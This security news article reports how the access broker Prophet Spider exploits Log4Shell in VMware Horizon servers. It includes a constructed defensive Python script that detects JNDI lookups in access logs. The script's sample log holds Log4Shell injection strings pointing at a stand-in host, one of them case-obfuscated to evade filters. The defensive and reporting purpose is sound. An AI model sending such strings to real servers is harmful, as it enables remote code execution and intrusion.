An initial access broker group tracked as Prophet Spider has been linked to a set of malicious activities that exploit the Log4Shell vulnerability in unpatched VMware Horizon servers.
According to new research published today by BlackBerry's Research & Intelligence and Incident Response (IR) teams, the cybercrime actor has been opportunistically weaponizing the flaw to retrieve a second-stage payload onto the victimized systems.
The payloads observed include cryptocurrency miners, Cobalt Strike Beacons, and web shells, corroborating an earlier advisory from the U.K. National Health Service (NHS) that sounded the alarm on active exploitation of the vulnerabilities in VMware Horizon servers to drop malicious web shells and establish persistence on affected networks for follow-on attacks.
Log4Shell is a moniker used to refer to an exploit affecting the popular Apache Log4j library that results in remote code execution when a specially crafted string is logged. Since public disclosure of the flaw last month, threat actors have been quick to operationalize this new attack vector for a variety of intrusion campaigns aimed at gaining full control of affected servers.
BlackBerry said it observed instances of exploitation mirroring tactics, techniques, and procedures (TTPs) previously attributed to the Prophet Spider eCrime cartel, including the use of the "C:\Windows\Temp\7fde" folder path to store malicious files and the "wget.bin" executable to fetch additional binaries, as well as overlaps in infrastructure used by the group.
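As an added, constructed example (not code from the BlackBerry report or from this article), the following script scans web-server access log lines for the logged JNDI lookup string that Log4Shell abuses, so a defender can spot exploitation attempts against a Horizon front end; the log lines, IP addresses, and URL paths are made up.

```python
import re

# Constructed sample access log lines (assumption: a Horizon web front end that logs
# the User-Agent header and the query string). Two lines carry a JNDI lookup, one of
# them wrapped in a nested case lookup; the other two are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2022:10:01:02 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Jan/2022:10:01:07 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"
10.0.0.9 - - [10/Jan/2022:10:01:09 +0000] "GET /portal/info.jsp?x=${${lower:j}ndi:rmi://198.51.100.7:1099/b} HTTP/1.1" 404 0 "-" "curl/7.79"
10.0.0.12 - - [10/Jan/2022:10:02:00 +0000] "POST /portal/login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Log4j resolves single-character case lookups such as ${lower:j} to that character,
# so a detector has to collapse them before it can see the literal "${jndi:" prefix.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^}])\}", re.IGNORECASE)
_JNDI = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns|iiop|corba|nds|http)://([^}/]+)", re.IGNORECASE)


def normalize(line: str) -> str:
    """Repeatedly collapse ${lower:x}/${upper:x} wrappers so nested lookups flatten out."""
    prev = None
    while prev != line:
        prev, line = line, _CASE_LOOKUP.sub(lambda m: m.group(1), line)
    return line


def find_jndi_lookups(log_text: str) -> list[dict]:
    """Return one finding per log line containing a JNDI lookup: source IP, protocol, target."""
    findings = []
    for lineno, raw in enumerate(log_text.splitlines(), start=1):
        m = _JNDI.search(normalize(raw))
        if m:
            findings.append({"line": lineno, "src": raw.split()[0],
                             "protocol": m.group(1).lower(), "target": m.group(2)})
    return findings


if __name__ == "__main__":
    for f in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {f['line']}: {f['src']} -> jndi:{f['protocol']}://{f['target']}")
```

The target host and port in each finding are the values to cross-check against firewall and DNS logs for outbound connections from the Horizon server.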
"Prophet Spider primarily gains access to victims by compromising vulnerable web servers, and uses a variety of low-prevalence tools to achieve operational objectives," CrowdStrike noted in August 2021, when the group was observed actively exploiting flaws in Oracle WebLogic servers to gain initial access to target environments.
As with many other initial access brokers, the footholds are sold to the highest bidder on underground forums located on the dark web, who then exploit the access for ransomware deployment. Prophet Spider is known to have been active since at least May 2017.
This is far from the first time internet-facing systems running VMware Horizon have come under attack using Log4Shell exploits. Earlier this month, Microsoft called out a China-based operator tracked as DEV-0401 for deploying a new ransomware strain called NightSky on the compromised servers.
The onslaught against Horizon servers has also prompted VMware to urge its customers to apply the patches immediately. "The ramifications of this vulnerability are serious for any system, especially ones that accept traffic from the open Internet," the virtualization services provider cautioned.
"When an access broker group takes interest in a vulnerability whose scope is so unknown, it's a good indication that attackers see significant value in its exploitation," Tony Lee, vice president of global services technical operations at BlackBerry, said.
"It's likely that we'll continue to see criminal groups exploring the opportunities of the Log4Shell vulnerability, so it's an attack vector against which defenders need to exercise constant vigilance," Lee added.